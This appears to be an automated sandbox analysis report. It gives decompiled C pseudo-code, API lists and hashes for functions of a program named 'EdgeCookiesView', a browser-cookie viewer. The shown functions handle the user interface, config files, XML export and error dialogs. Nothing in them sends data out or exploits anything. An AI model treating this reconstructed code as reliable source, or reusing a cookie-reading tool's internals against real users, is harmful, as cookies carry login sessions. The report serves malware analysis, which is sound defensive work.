								if(_t69 != 0) {
									_t59 =  *0x4128d0(_v16,  &_a552);
									continue;
								}
								goto L18;
							}
							goto L18;
						}
					}
				} else {
					_t109 =  *0x413260 - _t98; // 0x0
					if(_t109 == 0) {
						goto L12;
					} else {
						_t72 = OpenProcess(0x410, 0, _a4);
						_v0 = _t72;
						if(_t72 != 0) {
							_push( &_a4);
							_push(0x8000);
							_push( &_a2160);
							_push(_t72);
							if( *0x4128e0() != 0) {
								_t6 =  &_v12;
								 *_t6 = _v12 >> 2;
								_v8 = 1;
								_t90 = 0;
								if( *_t6 != 0) {
									while(1) {
										_a1616 = _t98;
										memset( &_a1618, _t98, 0x208);
										memset( &_a8, _t98, 0x21c);
										_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
										_t106 = _t106 + 0x18;
										_a8 = _a4;
										_a12 = _t78;
										 *0x4128d8(_v16, _t78,  &_a1616, 0x104);
										E0040CAF2( &_v0,  &_a1600);
										_push(0xc);
										_push( &_v20);
										_push(_v4);
										_push(_v32);
										if( *0x4128e4() != 0) {
											_a508 = _v32;
											_a512 = _v36;
										}
										if(E0040CDF8(_a8,  &_v24) == 0) {
											goto L18;
										}
										_t90 = _t90 + 1;
										if(_t90 < _v44) {
											_t98 = 0;
											__eflags = 0;
											continue;
										} else {
										}
										goto L18;
									}
								}
							}
							L18:
							CloseHandle(_v16);
						}
					}
				}
				return _a8;
			}

0x0040cbdb
0x0040cbe3
0x0040cbeb
0x0040cbed
0x0040cbf8
0x0040cd1b
0x0040cd1b
0x0040cd21
0x0040cd27
0x0040cd2d
0x0040cd33
0x0040cd36
0x0040cd3a
0x0040cd4e
0x0040cd56
0x0040cd5d
0x0040cddf
0x0040cddf
0x0040cde1
0x00000000
0x00000000
0x0040cd70
0x0040cd7c
0x0040cd8d
0x0040cd91
0x0040cd9d
0x0040cdab
0x0040cdae
0x0040cdbd
0x0040cdc4
0x0040cdc9
0x0040cdcb
0x0040cdd9
0x00000000
0x0040cdd9
0x00000000
0x0040cdcb
0x00000000
0x0040cddf
0x0040cd3a
0x0040cbfe
0x0040cbfe
0x0040cc04
0x00000000
0x0040cc0a
0x0040cc13
0x0040cc1b
0x0040cc1f
0x0040cc29
0x0040cc2a
0x0040cc36
0x0040cc37
0x0040cc40
0x0040cc46
0x0040cc46
0x0040cc4b
0x0040cc53
0x0040cc55
0x0040cc5f
0x0040cc6d
0x0040cc75
0x0040cc85
0x0040cc8d
0x0040cc94
0x0040cc9c
0x0040ccad
0x0040ccb1
0x0040ccc2
0x0040ccc7
0x0040cccd
0x0040ccce
0x0040ccd2
0x0040ccde
0x0040cce4
0x0040ccef
0x0040ccef
0x0040cd05
0x00000000
0x00000000
0x0040cd0b
0x0040cd10
0x0040cc5d
0x0040cc5d
0x00000000
0x00000000
0x0040cd16
0x00000000
0x0040cd10
0x0040cc5f
0x0040cc55
0x0040cde3
0x0040cde7
0x0040cde7
0x0040cc1f
0x0040cc04
0x0040cdf7

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040C2CF,00000000,00000000), ref: 0040CC13
memset.MSVCRT ref: 0040CC75
memset.MSVCRT ref: 0040CC85

Part of subcall function 0040CAF2: wcscpy.MSVCRT ref: 0040CB1B

memset.MSVCRT ref: 0040CD70
wcscpy.MSVCRT ref: 0040CD91
CloseHandle.KERNEL32(?,0040C2CF,?,?,?,0040C2CF,00000000,00000000), ref: 0040CDE7

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$wcscpy$CloseHandleOpenProcess
String ID:
API String ID: 3300951397-0
Opcode ID: 1fcad76c0bd3129941d7854f28fd29f69da4d45da8680cfa1fd3405ce168179b
Instruction ID: e16d66228f4dae7d6f5bcc77b9324eed5b76837c7fa80b75a9be3f82a58a018a
Opcode Fuzzy Hash: 1fcad76c0bd3129941d7854f28fd29f69da4d45da8680cfa1fd3405ce168179b
Instruction Fuzzy Hash: 93513C71108344EBD720EF65C884A9BBBE8FF84304F004A3EF589E6191DB75D945CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 004036F7, Relevance: 9.1, APIs: 6, Instructions: 106
windowCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004036F7(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
				struct HWND__* _t29;
				intOrPtr* _t54;
				struct HWND__* _t61;
				struct HWND__* _t62;
				intOrPtr* _t66;
				void* _t67;
				intOrPtr* _t68;

				_t58 = __edx;
				_push(__ebx);
				_t66 = __ecx;
				E00401712( *((intOrPtr*)(__ecx + 0x10)), __edx, __ecx + 0x40, __eflags);
				_t61 = GetDlgItem( *(_t66 + 0x10), 0x40c);
				E00405700(_t61, E00406827(0x2ef), 1);
				E00405700(_t61, E00406827(0x2f0), 2);
				SendMessageW(_t61, 0x160, 0x15e, 0);
				_t62 = GetDlgItem( *(_t66 + 0x10), 0x40e);
				E00405700(_t62, E00406827(0x2f9), 1);
				E00405700(_t62, E00406827(0x2fa), 2);
				E00405700(_t62, E00406827(0x2fb), 3);
				E00405700(_t62, E00406827(0x2fc), 4);
				E00405700(_t62, E00406827(0x2fd), 5);
				SendMessageW(_t62, 0x160, 0x15e, 0);
				_t29 = GetDlgItem( *(_t66 + 0x10), 0x40f);
				_t63 = _t29;
				SendMessageW(_t29, 0x160, 0x15e, 0);
				E00405700(_t29, E00406827(0x30d), 1);
				E00405700(_t63, E00406827(0x30e), 2);
				_t54 = _t66;
				_pop(_t67);
				_t68 = _t54;
				 *((intOrPtr*)( *_t68 + 4))(1, _t67);
				 *((intOrPtr*)( *_t68 + 0x1c))();
				E00405B17(_t58,  *((intOrPtr*)(_t68 + 0x10)), 4);
				return 0;
			}

0x004036f7
0x004036f7
0x004036fa
0x00403703
0x0040371f
0x00403728
0x0040373a
0x0040374f
0x00403766
0x0040376f
0x00403781
0x00403797
0x004037a9
0x004037bf
0x004037da
0x004037e4
0x004037e6
0x004037f5
0x00403805
0x00403817
0x00403820
0x00403822
0x0040165a
0x00401660
0x00401667
0x0040166f
0x00401679

APIs

Part of subcall function 00401712: GetClientRect.USER32 ref: 0040171E
Part of subcall function 00401712: GetWindow.USER32(?,00000005), ref: 00401737
Part of subcall function 00401712: GetWindow.USER32(00000000), ref: 0040173A
Part of subcall function 00401712: GetWindow.USER32(00000000,00000002), ref: 0040174C

GetDlgItem.USER32 ref: 00403716

Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
Part of subcall function 00406827: LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
Part of subcall function 00406827: memcpy.MSVCRT ref: 0040693F

Part of subcall function 00405700: SendMessageW.USER32(?,00000143,00000000,?), ref: 00405717
Part of subcall function 00405700: SendMessageW.USER32(?,00000151,00000000,?), ref: 00405729

Part of subcall function 00406827: wcscpy.MSVCRT ref: 004068A8
Part of subcall function 00406827: wcslen.MSVCRT ref: 004068C6
Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4

SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040374F
GetDlgItem.USER32 ref: 0040375D
SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 004037DA
GetDlgItem.USER32 ref: 004037E4
SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 004037F5

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$ItemWindow$HandleModule$ClientLoadRectStringmemcpywcscpywcslen
String ID:
API String ID: 3030901043-0
Opcode ID: 1047b60b3950c8a152ac73b551837c30685554d49de1232bf18ecab51a8f137e
Instruction ID: 086a44b27e78f4b83ae4b6e77ae60044790fc96d4b444eb8a6a68cf3e2127a69
Opcode Fuzzy Hash: 1047b60b3950c8a152ac73b551837c30685554d49de1232bf18ecab51a8f137e
Instruction Fuzzy Hash: 9E21A3B6640700B7E11132625C87F3B26ACDB45B2DF42143EFB517A1C3D9BE5816256D

Uniqueness

Uniqueness Score: -1.00%

Function 00401810, Relevance: 9.0, APIs: 6, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00401810(void* __ebx) {
				struct tagRECT _v20;
				struct tagPAINTSTRUCT _v84;

				GetClientRect( *(__ebx + 0x10),  &_v20);
				_v20.left = _v20.right - GetSystemMetrics(0x15);
				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
				return EndPaint( *(__ebx + 0x10),  &_v84);
			}

0x0040181f
0x00401836
0x00401840
0x00401848
0x00401849
0x0040184d
0x00401852
0x00401862
0x00401878

APIs

GetClientRect.USER32 ref: 0040181F
GetSystemMetrics.USER32 ref: 0040182D
GetSystemMetrics.USER32 ref: 00401839
BeginPaint.USER32(?,?), ref: 00401853
DrawFrameControl.USER32 ref: 00401862
EndPaint.USER32(?,?), ref: 0040186F

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
String ID:
API String ID: 19018683-0
Opcode ID: c8a69a874f342f7a3e97f07006a698148a3ee1bf1249d9731753e706e314068b
Instruction ID: 1a6c8e31efcae22bf085037e8d33cf81da157de282c50ef6ca12fa9021a14783
Opcode Fuzzy Hash: c8a69a874f342f7a3e97f07006a698148a3ee1bf1249d9731753e706e314068b
Instruction Fuzzy Hash: 7A01FF72900218EFDF14DFA4DD459FE7B79FB45301F000479EA11BA194DA71AA08CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0040B659, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122
windowkeyboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B659(intOrPtr __ecx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void _v518;
				signed short _v520;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t46;
				void* _t64;
				intOrPtr* _t71;
				intOrPtr _t73;

				_t67 = __ecx;
				_t73 = __ecx;
				_t71 = _a8;
				_v8 = __ecx;
				if(_a4 == 0x101 &&  *((intOrPtr*)(_t71 + 8)) == 0xfffffffe &&  *((intOrPtr*)(_t71 + 0xc)) == 1) {
					_v520 = _v520 & 0x00000000;
					memset( &_v518, 0, 0x1fe);
					E00401000( &_v520, _t67, 0x41203c);
					_t46 = E00405CD2( *((intOrPtr*)(_t73 + 0x208)),  &_v520);
					_t71 = _a8;
				}
				if( *(_t71 + 4) == 0x103 &&  *((intOrPtr*)(_t71 + 8)) == 0xfffffff4) {
					_t46 = E00407DC0( *((intOrPtr*)(_t73 + 0x69c)), _t71);
					 *((intOrPtr*)(_t73 + 0x20c)) = 1;
					 *(_t73 + 0x210) = _t46;
				}
				if( *((intOrPtr*)(_t71 + 8)) == 0xfffffdee) {
					_t46 = SendMessageW( *(_t73 + 0x218), 0x423, 0, 0);
					if( *_t71 == _t46) {
						_t46 = GetMenuStringW( *(_t73 + 0x21c),  *(_t71 + 4), _t71 + 0x10, 0x4f, 0);
						 *(_t71 + 0xb0) =  *(_t71 + 0xb0) & 0x00000000;
					}
				}
				if(_a4 != 0x103) {
					L29:
					return _t46;
				} else {
					if( *((intOrPtr*)(_t71 + 8)) == 0xfffffffd) {
						_t46 = E0040B0C2(_t73);
						_t71 = _a8;
					}
					if( *((intOrPtr*)(_t71 + 8)) == 0xffffff94) {
						_t64 = 0;
						if(GetKeyState(0x10) < 0) {
							_t64 = 1;
						}
						_t46 = E00407CA2( *(_t71 + 0x10), _t67,  *((intOrPtr*)(_t73 + 0x69c)), 0, _t64);
						_t73 = _v8;
						_t71 = _a8;
					}
					_t68 =  *((intOrPtr*)(_t73 + 0x69c));
					if( *((intOrPtr*)( *((intOrPtr*)(_t73 + 0x69c)) + 0x2f4)) != 0) {
						_t92 =  *((intOrPtr*)(_t71 + 8)) - 0xffffff4f;
						if( *((intOrPtr*)(_t71 + 8)) == 0xffffff4f) {
							_t46 = E0040824E(_t71, _t68, _t92);
						}
						if( *((intOrPtr*)(_t71 + 8)) == 0xffffff4d) {
							_t63 =  *((intOrPtr*)(_t73 + 0x69c));
							_t46 = E004081B3(_t71,  *((intOrPtr*)(_t73 + 0x69c)), 0);
							if(_t46 == 0xffffffff && ( *(_t71 + 0x10) & 0x0000000c) != 0) {
								_t46 = E004081B3(_t71, _t63, 1);
							}
							 *((intOrPtr*)(_t73 + 0x20c)) = 1;
							 *(_t73 + 0x210) = _t46;
						}
					}
					if( *((intOrPtr*)(_t71 + 8)) != 0xffffff9b) {
						goto L29;
					} else {
						_t46 = E00402D29(_t71);
						if(_t46 == 0) {
							goto L29;
						}
						_t46 = _t73 + 0x280;
						if( *_t46 != 0) {
							goto L29;
						}
						 *_t46 = 1;
						return E00401BDC(_t73, 0x402);
					}
				}
			}

0x0040b659
0x0040b66b
0x0040b66e
0x0040b671
0x0040b674
0x0040b682
0x0040b698
0x0040b6a8
0x0040b6b6
0x0040b6bb
0x0040b6be
0x0040b6c9
0x0040b6d7
0x0040b6dc
0x0040b6e6
0x0040b6e6
0x0040b6f3
0x0040b704
0x0040b70c
0x0040b71f
0x0040b725
0x0040b725
0x0040b70c
0x0040b72f
0x0040b810
0x0040b810
0x0040b735
0x0040b739
0x0040b73d
0x0040b742
0x0040b742
0x0040b749
0x0040b74d
0x0040b758
0x0040b75a
0x0040b75a
0x0040b767
0x0040b76c
0x0040b76f
0x0040b76f
0x0040b772
0x0040b77f
0x0040b781
0x0040b788
0x0040b78c
0x0040b78c
0x0040b798
0x0040b79a
0x0040b7a6
0x0040b7ae
0x0040b7bc
0x0040b7bc
0x0040b7c1
0x0040b7cb
0x0040b7cb
0x0040b798
0x0040b7d5
0x00000000
0x0040b7d7
0x0040b7e6
0x0040b7ed
0x00000000
0x00000000
0x0040b7ef
0x0040b7f8
0x00000000
0x00000000
0x0040b7fa
0x00000000
0x0040b807
0x0040b7d5

APIs

memset.MSVCRT ref: 0040B698

Part of subcall function 00405CD2: ShellExecuteW.SHELL32(?,open,?,0040F454,0040F454,00000005), ref: 00405CE8

SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 0040B704
GetMenuStringW.USER32 ref: 0040B71F
GetKeyState.USER32(00000010), ref: 0040B74F

Strings

< A, xrefs: 0040B6A3

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ExecuteMenuMessageSendShellStateStringmemset
String ID: < A
API String ID: 3550944819-1181716546
Opcode ID: c907c4734865cfa602ecd8c77a846019eba843dd06bc836bba2509596532bbff
Instruction ID: cd89550f5cd4c0fed4b6d451fcd4293cb33e7e96a54fd1b4e036968a3aaec8cf
Opcode Fuzzy Hash: c907c4734865cfa602ecd8c77a846019eba843dd06bc836bba2509596532bbff
Instruction Fuzzy Hash: 9541A570600705EBDB20AF25C8897A6B365FF50325F10863EE5796B6D1C7B9AC91CB8C

Uniqueness

Uniqueness Score: -1.00%

Function 0040B147, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B147(void* __eax, void* __ecx, intOrPtr _a4) {
				void _v526;
				long _v528;
				short _v1050;
				long _v1572;
				intOrPtr _v1576;
				char _v1580;
				void* __ebx;
				void* __edi;
				void* __esi;
				wchar_t* _t24;
				void* _t41;
				void* _t42;

				_t41 = __ecx;
				_t42 = __eax;
				if( *((intOrPtr*)(__eax + 0x27c)) == 0) {
					_v528 = 0;
					memset( &_v526, 0, 0x208);
					E00405800( &_v528);
					_t24 = wcsrchr( &_v528, 0x2e);
					if(_t24 != 0) {
						 *_t24 = 0;
					}
					wcscat( &_v528, L".cfg");
					_v1576 = _a4;
					_v1580 = 0x410838;
					_v1572 = 0;
					_v1050 = 0;
					wcscpy( &_v1572,  &_v528);
					E0040D909( &_v1580);
					_t45 =  &_v1580;
					E00401C0A( *((intOrPtr*)(_t42 + 0x698)),  &_v1580);
					E0040196B(_t42, _t41,  &_v1580);
					return E004077F5(_t45, _t41,  *((intOrPtr*)(_t42 + 0x69c)));
				}
				return __eax;
			}

0x0040b147
0x0040b152
0x0040b15c
0x0040b16f
0x0040b176
0x0040b182
0x0040b190
0x0040b19a
0x0040b19c
0x0040b19c
0x0040b1ac
0x0040b1b4
0x0040b1c8
0x0040b1d2
0x0040b1d9
0x0040b1e0
0x0040b1ee
0x0040b1f9
0x0040b1ff
0x0040b206
0x00000000
0x0040b218
0x0040b21c

APIs

memset.MSVCRT ref: 0040B176

Part of subcall function 00405800: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,004073D6,00000000,00407289,?,00000000,00000208,?), ref: 0040580B

wcsrchr.MSVCRT ref: 0040B190
wcscat.MSVCRT ref: 0040B1AC
wcscpy.MSVCRT ref: 0040B1E0

Strings

.cfg, xrefs: 0040B1A6

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: FileModuleNamememsetwcscatwcscpywcsrchr
String ID: .cfg
API String ID: 3959449883-3410578098
Opcode ID: c10ae3566cda4adbb0fcd7ff867f165b55a5c0b0dedcdb095373c37a526f42fc
Instruction ID: 6b4b3dac03b364a6e9d67aab511530dcf3da6c65583dd03dece53c0e4fe42f45
Opcode Fuzzy Hash: c10ae3566cda4adbb0fcd7ff867f165b55a5c0b0dedcdb095373c37a526f42fc
Instruction Fuzzy Hash: 0611BC739016285ACB20EB65CC45ACEB37DEF48314F0041F7E518B7142E7759A958F9D

Uniqueness

Uniqueness Score: -1.00%

Function 00408E65, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00408E65(void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				void _v514;
				signed short _v516;
				signed short* _t30;
				signed short* _t34;
				signed int _t37;
				void* _t40;
				signed short* _t44;
				void* _t46;

				_t40 = __edi;
				_t38 = __ecx;
				E00408857(__edi, __ecx, _a4, L"<item>\r\n");
				_t37 = 0;
				if( *((intOrPtr*)(__edi + 0x34)) > 0) {
					do {
						_v516 = _v516 & 0x00000000;
						memset( &_v514, 0, 0x1fc);
						_t30 =  *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x38)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x68)));
						_t38 =  *((intOrPtr*)(__edi + 0x6c));
						E0040DBDA(_t30,  *((intOrPtr*)(__edi + 0x6c)));
						_t44 =  &_v516;
						E004086F5(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x38)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x48)) + 0x10)));
						_t34 = _t44;
						_push(_t34);
						_push( *((intOrPtr*)(__edi + 0x6c)));
						_push(_t34);
						_push(L"<%s>%s</%s>\r\n");
						_push(0x2000);
						_push( *((intOrPtr*)(__edi + 0x70)));
						L0040DFD6();
						_t46 = _t46 + 0x24;
						E00408857(__edi,  *((intOrPtr*)(__edi + 0x6c)), _a4,  *((intOrPtr*)(__edi + 0x70)));
						_t37 = _t37 + 1;
					} while (_t37 <  *((intOrPtr*)(__edi + 0x34)));
				}
				return E00408857(_t40, _t38, _a4, L"</item>\r\n");
			}

0x00408e65
0x00408e65
0x00408e79
0x00408e7e
0x00408e83
0x00408e86
0x00408e86
0x00408e9c
0x00408eb3
0x00408eb5
0x00408eb8
0x00408ec7
0x00408ecd
0x00408ed2
0x00408ed4
0x00408ed5
0x00408ed8
0x00408ed9
0x00408ede
0x00408ee3
0x00408ee6
0x00408eeb
0x00408ef6
0x00408efb
0x00408efc
0x00408f01
0x00408f13

APIs

memset.MSVCRT ref: 00408E9C

Part of subcall function 0040DBDA: memcpy.MSVCRT ref: 0040DC57

Part of subcall function 004086F5: wcscpy.MSVCRT ref: 004086FA
Part of subcall function 004086F5: _wcslwr.MSVCRT ref: 0040872D

_snwprintf.MSVCRT ref: 00408EE6

Strings

<item>, xrefs: 00408E6F
<%s>%s</%s>, xrefs: 00408ED9
</item>, xrefs: 00408F02

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
String ID: <%s>%s</%s>$</item>$<item>
API String ID: 1775345501-2769808009
Opcode ID: cccc76d828ed89dcb2f0cf120a02d783cc869ebbd7d411c31fb40a59302af15a
Instruction ID: 8f4cdbf62ca08d82a34ba29bd692b6b076faad5caef0efcefbde8902b8c83394
Opcode Fuzzy Hash: cccc76d828ed89dcb2f0cf120a02d783cc869ebbd7d411c31fb40a59302af15a
Instruction Fuzzy Hash: BC11BF32A0021ABBDB11BF25CD86E997B25BF04308F00407AF945776A2C739B864DBD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040BA94, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040BA94(void* __esi) {
				struct _WNDCLASSW _v44;
				struct HINSTANCE__* _t20;
				struct HWND__* _t23;

				_v44.style = 0;
				_v44.lpfnWndProc = E00401896;
				_v44.cbClsExtra = 0;
				_v44.cbWndExtra = 0;
				_v44.hInstance = GetModuleHandleW(0);
				_v44.hIcon =  *((intOrPtr*)(__esi + 0x204));
				_v44.lpszClassName = __esi + 4;
				_v44.hCursor = 0;
				_v44.hbrBackground = 0x10;
				_v44.lpszMenuName = 0;
				RegisterClassW( &_v44);
				_t20 = GetModuleHandleW(0);
				_t23 = CreateWindowExW(0, L"EdgeCookiesView", L"EdgeCookiesView", 0xcf0000, 0x80000000, 0x80000000, 0x280, 0x1e0, 0, 0, _t20, __esi);
				 *(__esi + 0x208) = _t23;
				return _t23;
			}

0x0040baa5
0x0040baa8
0x0040baaf
0x0040bab2
0x0040bab7
0x0040bac0
0x0040bac6
0x0040bacd
0x0040bad0
0x0040bad7
0x0040bada
0x0040bae1
0x0040bb05
0x0040bb0c
0x0040bb14

APIs

GetModuleHandleW.KERNEL32(00000000,75144E00,00000000), ref: 0040BAB5
RegisterClassW.USER32 ref: 0040BADA
GetModuleHandleW.KERNEL32(00000000), ref: 0040BAE1
CreateWindowExW.USER32 ref: 0040BB05

Strings

EdgeCookiesView, xrefs: 0040BAFD, 0040BB02, 0040BB03

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleModule$ClassCreateRegisterWindow
String ID: EdgeCookiesView
API String ID: 2678498856-2656830938
Opcode ID: d52d2fbc62bc1a1d04585868950ee5189a48b6182fc5a22ab83782a1eaa0276c
Instruction ID: 27e191b6334208d49ef5ca2aa5ba4bd18f44ae4e1b08ed08d13d2dfcc62d9bb3
Opcode Fuzzy Hash: d52d2fbc62bc1a1d04585868950ee5189a48b6182fc5a22ab83782a1eaa0276c
Instruction Fuzzy Hash: 3A01C8B1900208AFD711DF9A8D85AFFFBFCEB88710F10402AE915F2251D7B459458BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00406DE5, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00406DE5(void* __eflags, WCHAR* _a4, WCHAR* _a8, intOrPtr _a12) {
				void _v8198;
				short _v8200;
				void* _t18;

				E0040E340(0x2004, _t18);
				_v8200 = _v8200 & 0x00000000;
				memset( &_v8198, 0, 0x2000);
				GetPrivateProfileStringW(0x412e48, _a4, 0x40f454,  &_v8200, 0x1000, 0x412c38);
				if(_v8200 == 0 || _a12 != 0) {
					return WritePrivateProfileStringW(0x412e48, _a4, _a8, 0x412c38);
				} else {
					return 0;
				}
			}

0x00406ded
0x00406df2
0x00406e0a
0x00406e32
0x00406e40
0x00000000
0x00406e48
0x00000000
0x00406e48

APIs

memset.MSVCRT ref: 00406E0A
GetPrivateProfileStringW.KERNEL32 ref: 00406E32
WritePrivateProfileStringW.KERNEL32(00412E48,?,?,00412C38), ref: 00406E54

Strings

H.A, xrefs: 00406E2C
8,A, xrefs: 00406E12

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfileString$Writememset
String ID: 8,A$H.A
API String ID: 747731527-1209539780
Opcode ID: 77254ae23b063488fbe1f1531f71c30f435901724466fd7cc02357835f3fcc14
Instruction ID: e7880ec6ba8d46fe6e1110b4845dc0794c3ddc75899781143fe08dcc0165ab72
Opcode Fuzzy Hash: 77254ae23b063488fbe1f1531f71c30f435901724466fd7cc02357835f3fcc14
Instruction Fuzzy Hash: 91F0C836501318BAEB205B11CD4DFCB3779DB54714F004471BB05B61C2D3B89A94C6AD

Uniqueness

Uniqueness Score: -1.00%

Function 004053B1, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31
windowCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E004053B1(long __ecx, void* __eflags, struct HWND__* _a4) {
				char _v2052;
				short _v4100;
				void* __edi;
				long _t15;
				long _t16;

				_t15 = __ecx;
				E0040E340(0x1000, __ecx);
				_t16 = _t15;
				if(_t16 == 0) {
					_t16 = GetLastError();
				}
				E004052B3(_t16,  &_v2052);
				_push( &_v2052);
				_push(_t16);
				_push(L"Error %d: %s");
				_push(0x400);
				_push( &_v4100);
				L0040DFD6();
				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
			}

0x004053b1
0x004053b9
0x004053bf
0x004053c3
0x004053cb
0x004053cb
0x004053d4
0x004053df
0x004053e0
0x004053e1
0x004053ec
0x004053f1
0x004053f2
0x00405413

APIs

GetLastError.KERNEL32(00000000,?,004097E7,00000000,?,?,00000001,0040BE1B,0040F454,00000000,00000000,00000000,00000000,75144E00,?), ref: 004053C5
_snwprintf.MSVCRT ref: 004053F2
MessageBoxW.USER32(?,?,Error,00000030), ref: 0040540B

Strings

Error, xrefs: 004053FC
Error %d: %s, xrefs: 004053E1

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastMessage_snwprintf
String ID: Error$Error %d: %s
API String ID: 313946961-1552265934
Opcode ID: c128aad518d94d0d1b5362608b5f3687addf0f3260f5ed8ca175d7d1039385b6
Instruction ID: d03f13e4b5835148045d3301d553e71923c4c821524e10c745d4efb14aa9052b
